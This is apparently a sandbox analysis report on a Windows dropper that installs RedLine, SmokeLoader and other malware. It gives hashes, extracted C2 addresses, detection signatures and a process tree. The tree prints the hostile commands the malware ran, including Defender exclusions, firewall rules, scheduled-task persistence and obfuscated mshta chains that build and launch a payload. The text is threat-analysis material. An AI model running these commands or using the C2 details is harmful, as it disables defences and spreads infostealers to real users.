Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    84s
  • max time network
    345s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    10-11-2021 14:52

General

  • Target

    5524bfd8269c656293e16b8da80bd43983f457f261f052e166d90a079517115f.exe

  • Size

    4.7MB

  • MD5

    2f3136374745c23cc8b0d05329712308

  • SHA1

    06a587bb27cca266d53a593d445b7917faae8646

  • SHA256

    5524bfd8269c656293e16b8da80bd43983f457f261f052e166d90a079517115f

  • SHA512

    4efcdd92d0e4234d20b64dd1442931dcc4e8c0b0b5490b2edbdcc5ce209f39b74730f1c0ded07c3d229507b5ce666df76dab4a1dda6ed4d2147fc4da1b81de7b

Malware Config

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

redline

Botnet

media12

C2

91.121.67.60:2151

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

    suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 16 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5524bfd8269c656293e16b8da80bd43983f457f261f052e166d90a079517115f.exe
    "C:\Users\Admin\AppData\Local\Temp\5524bfd8269c656293e16b8da80bd43983f457f261f052e166d90a079517115f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3612
      • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3168
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:400
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue091141e83ec9eb0cd.exe
          4⤵
            PID:1144
            • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\Tue091141e83ec9eb0cd.exe
              Tue091141e83ec9eb0cd.exe
              5⤵
              • Executes dropped EXE
              PID:2024
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue0946b7f7f150c.exe /mixone
            4⤵
              PID:360
              • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\Tue0946b7f7f150c.exe
                Tue0946b7f7f150c.exe /mixone
                5⤵
                • Executes dropped EXE
                PID:1708
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 660
                  6⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3364
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 680
                  6⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4224
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 776
                  6⤵
                  • Program crash
                  PID:4428
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 824
                  6⤵
                  • Program crash
                  PID:3768
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 956
                  6⤵
                  • Program crash
                  PID:4552
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1072
                  6⤵
                  • Program crash
                  PID:2772
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1260
                  6⤵
                  • Program crash
                  PID:5348
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue0978ae4cb9cc7a133.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2536
              • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\Tue0978ae4cb9cc7a133.exe
                Tue0978ae4cb9cc7a133.exe
                5⤵
                • Executes dropped EXE
                PID:2040
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 2040 -s 784
                  6⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4016
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue09695d107750bddf.exe
              4⤵
                PID:960
                • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\Tue09695d107750bddf.exe
                  Tue09695d107750bddf.exe
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1924
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Tue09eee37bdea.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2372
                • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\Tue09eee37bdea.exe
                  Tue09eee37bdea.exe
                  5⤵
                  • Executes dropped EXE
                  PID:1652
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Tue09c46db89b.exe
                4⤵
                  PID:344
                  • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\Tue09c46db89b.exe
                    Tue09c46db89b.exe
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1724
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Tue09394433a077.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1972
                  • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\Tue09394433a077.exe
                    Tue09394433a077.exe
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:2116
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Tue0922dda4102d4.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1344
                  • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\Tue0922dda4102d4.exe
                    Tue0922dda4102d4.exe
                    5⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:2216
                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\icuin.exe
                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\icuin.exe
                      6⤵
                      • Executes dropped EXE
                      PID:3108
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
                        7⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3192
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Tue09d0056b714a.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:744
                  • C:\Users\Admin\AppData\Local\Temp\7zSC1EDDF77\Tue09d0056b714a.exe
                    Tue09d0056b714a.exe
                    5⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3868
                    • C:\Users\Admin\Pictures\Adobe Films\EJAir5cE3gE0FtGjZJWdHNt6.exe
                      "C:\Users\Admin\Pictures\Adobe Films\EJAir5cE3gE0FtGjZJWdHNt6.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:4124
                    • C:\Users\Admin\Pictures\Adobe Films\KqpeNNV4n2bQgKj97M7Un1N7.exe
                      "C:\Users\Admin\Pictures\Adobe Films\KqpeNNV4n2bQgKj97M7Un1N7.exe"
                      6⤵
                        PID:4752
                      • C:\Users\Admin\Pictures\Adobe Films\0DyCY81s4f3HhPSRYfqFgvX7.exe
                        "C:\Users\Admin\Pictures\Adobe Films\0DyCY81s4f3HhPSRYfqFgvX7.exe"
                        6⤵
                          PID:4596
                        • C:\Users\Admin\Pictures\Adobe Films\6t6BBpbiMrMdUQQxk3YWz7Qq.exe
                          "C:\Users\Admin\Pictures\Adobe Films\6t6BBpbiMrMdUQQxk3YWz7Qq.exe"
                          6⤵
                            PID:4988
                          • C:\Users\Admin\Pictures\Adobe Films\Fv2fwETxqQuQbzfUQrpYTd8Q.exe
                            "C:\Users\Admin\Pictures\Adobe Films\Fv2fwETxqQuQbzfUQrpYTd8Q.exe"
                            6⤵
                              PID:4432
                              • C:\Users\Admin\Documents\l8NkTAmvUHEdDvgF6n7dXjzI.exe
                                "C:\Users\Admin\Documents\l8NkTAmvUHEdDvgF6n7dXjzI.exe"
                                7⤵
                                  PID:4240
                                  • C:\Users\Admin\Pictures\Adobe Films\BM1c1KtAlHb7bS1nffaLtqBi.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\BM1c1KtAlHb7bS1nffaLtqBi.exe"
                                    8⤵
                                      PID:4580
                                    • C:\Users\Admin\Pictures\Adobe Films\d2V48f1dlO_go8imlW2hhpBs.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\d2V48f1dlO_go8imlW2hhpBs.exe"
                                      8⤵
                                        PID:1512
                                      • C:\Users\Admin\Pictures\Adobe Films\HXys8sxMJ4NjFFXRy9ui62Jn.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\HXys8sxMJ4NjFFXRy9ui62Jn.exe"
                                        8⤵
                                          PID:6216
                                        • C:\Users\Admin\Pictures\Adobe Films\_kqvaDxIvWLVv1P23GAy5gbY.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\_kqvaDxIvWLVv1P23GAy5gbY.exe"
                                          8⤵
                                            PID:6296
                                          • C:\Users\Admin\Pictures\Adobe Films\DNMnmlMGx8zB4OcsF_OUbe9E.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\DNMnmlMGx8zB4OcsF_OUbe9E.exe"
                                            8⤵
                                              PID:6376
                                            • C:\Users\Admin\Pictures\Adobe Films\MJstMxaV0M6nwua3r5OxzMg9.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\MJstMxaV0M6nwua3r5OxzMg9.exe"
                                              8⤵
                                                PID:6600
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\MJstMxaV0M6nwua3r5OxzMg9.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\MJstMxaV0M6nwua3r5OxzMg9.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                  9⤵
                                                    PID:6996
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\MJstMxaV0M6nwua3r5OxzMg9.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\MJstMxaV0M6nwua3r5OxzMg9.exe" ) do taskkill -f -iM "%~NxM"
                                                      10⤵
                                                        PID:6944
                                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                          11⤵
                                                            PID:1296
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                              12⤵
                                                                PID:7732
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                  13⤵
                                                                    PID:7912
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                  12⤵
                                                                    PID:7652
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                      13⤵
                                                                        PID:6472
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill -f -iM "MJstMxaV0M6nwua3r5OxzMg9.exe"
                                                                    11⤵
                                                                    • Kills process with taskkill
                                                                    PID:7728
                                                            • C:\Users\Admin\Pictures\Adobe Films\m_MsDgP1WHcGdAwbSDnw4zbC.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\m_MsDgP1WHcGdAwbSDnw4zbC.exe"
                                                              8⤵
                                                                PID:6800
                                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                  9⤵
                                                                    PID:7988
                                                                • C:\Users\Admin\Pictures\Adobe Films\mOd2ZhuDQNqnh3mOVUt_H_Jo.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\mOd2ZhuDQNqnh3mOVUt_H_Jo.exe"
                                                                  8⤵
                                                                    PID:6936
                                                                    • C:\Users\Admin\Pictures\Adobe Films\mOd2ZhuDQNqnh3mOVUt_H_Jo.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\mOd2ZhuDQNqnh3mOVUt_H_Jo.exe" -u
                                                                      9⤵
                                                                        PID:7752
                                                                    • C:\Users\Admin\Pictures\Adobe Films\ZkHj_9iLsuPRlp_hq8uOZObn.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\ZkHj_9iLsuPRlp_hq8uOZObn.exe"
                                                                      8⤵
                                                                        PID:6632
                                                                      • C:\Users\Admin\Pictures\Adobe Films\dcUyBuvx3HD_DwKqagaex45P.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\dcUyBuvx3HD_DwKqagaex45P.exe"
                                                                        8⤵
                                                                          PID:8008
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-M4V43.tmp\dcUyBuvx3HD_DwKqagaex45P.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-M4V43.tmp\dcUyBuvx3HD_DwKqagaex45P.tmp" /SL5="$1043E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\dcUyBuvx3HD_DwKqagaex45P.exe"
                                                                            9⤵
                                                                              PID:8152
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                          7⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:5424
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                          7⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:5524
                                                                      • C:\Users\Admin\Pictures\Adobe Films\wHs59H4gkkZxQt9EvaIZrx4b.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\wHs59H4gkkZxQt9EvaIZrx4b.exe"
                                                                        6⤵
                                                                          PID:4676
                                                                          • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                            7⤵
                                                                              PID:3768
                                                                          • C:\Users\Admin\Pictures\Adobe Films\1Qlzpt7yP7foeUXfZv38Grni.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\1Qlzpt7yP7foeUXfZv38Grni.exe"
                                                                            6⤵
                                                                              PID:4992
                                                                              • C:\Users\Admin\Pictures\Adobe Films\1Qlzpt7yP7foeUXfZv38Grni.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\1Qlzpt7yP7foeUXfZv38Grni.exe"
                                                                                7⤵
                                                                                  PID:3100
                                                                              • C:\Users\Admin\Pictures\Adobe Films\p8dxKiwfLWZCSbCyE2l9k2FS.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\p8dxKiwfLWZCSbCyE2l9k2FS.exe"
                                                                                6⤵
                                                                                  PID:4584
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                    7⤵
                                                                                      PID:4312
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\N95_XIGy75cHY6_aJC5W0ZUi.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\N95_XIGy75cHY6_aJC5W0ZUi.exe"
                                                                                    6⤵
                                                                                      PID:5084
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\5IC54wYhz7AJ56p7_cnIrARt.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\5IC54wYhz7AJ56p7_cnIrARt.exe"
                                                                                      6⤵
                                                                                        PID:4736
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\Um_nW7Kgk9p2k55xJIgqcv6l.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\Um_nW7Kgk9p2k55xJIgqcv6l.exe"
                                                                                        6⤵
                                                                                          PID:4804
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\MeZyqD1r8zl0Wg4HUib1lZ61.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\MeZyqD1r8zl0Wg4HUib1lZ61.exe"
                                                                                          6⤵
                                                                                            PID:5108
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                              7⤵
                                                                                                PID:8072
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /f /im chrome.exe
                                                                                                  8⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:7792
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Muj1RRC4BXQQfCCiFKdYLPGK.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Muj1RRC4BXQQfCCiFKdYLPGK.exe"
                                                                                              6⤵
                                                                                                PID:508
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                  7⤵
                                                                                                    PID:1236
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 576
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:5032
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\mp5Ra6ZxbA2OfW_WLtQeHHrv.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\mp5Ra6ZxbA2OfW_WLtQeHHrv.exe"
                                                                                                  6⤵
                                                                                                    PID:4852
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                      7⤵
                                                                                                        PID:4532
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                        7⤵
                                                                                                          PID:1460
                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                          7⤵
                                                                                                            PID:4764
                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                            schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                            7⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:5184
                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                            7⤵
                                                                                                              PID:5176
                                                                                                            • C:\Windows\System\svchost.exe
                                                                                                              "C:\Windows\System\svchost.exe" formal
                                                                                                              7⤵
                                                                                                                PID:5252
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                  8⤵
                                                                                                                    PID:5228
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                    8⤵
                                                                                                                      PID:5220
                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                      8⤵
                                                                                                                        PID:5500
                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                        8⤵
                                                                                                                          PID:5400
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\T0_y9r2UqvozGxtQzUKMsmDb.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\T0_y9r2UqvozGxtQzUKMsmDb.exe"
                                                                                                                      6⤵
                                                                                                                        PID:3164
                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\aOXUTHyC2CauuZUrgcxfF8WD.exe
                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\aOXUTHyC2CauuZUrgcxfF8WD.exe"
                                                                                                                        6⤵
                                                                                                                          PID:4848
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 676
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:4400
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 680
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:5220
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 676
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:5812
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\e__Nk4wIKQxVT_zCI2v_DBNI.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\e__Nk4wIKQxVT_zCI2v_DBNI.exe"
                                                                                                                          6⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:4256
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\e__Nk4wIKQxVT_zCI2v_DBNI.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\e__Nk4wIKQxVT_zCI2v_DBNI.exe"
                                                                                                                            7⤵
                                                                                                                              PID:5536
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\WIT0quypI9vNdqFWa9cIhtiX.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\WIT0quypI9vNdqFWa9cIhtiX.exe"
                                                                                                                            6⤵
                                                                                                                              PID:4040
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\WIT0quypI9vNdqFWa9cIhtiX.exe" & exit
                                                                                                                                7⤵
                                                                                                                                  PID:4864
                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                    timeout /t 5
                                                                                                                                    8⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:4748
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\SWkuKh9Boz7eCgRpfuYDVW6B.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\SWkuKh9Boz7eCgRpfuYDVW6B.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:4664
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2522082.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2522082.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:5272
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6816886.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6816886.exe"
                                                                                                                                      7⤵
                                                                                                                                        PID:5372
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
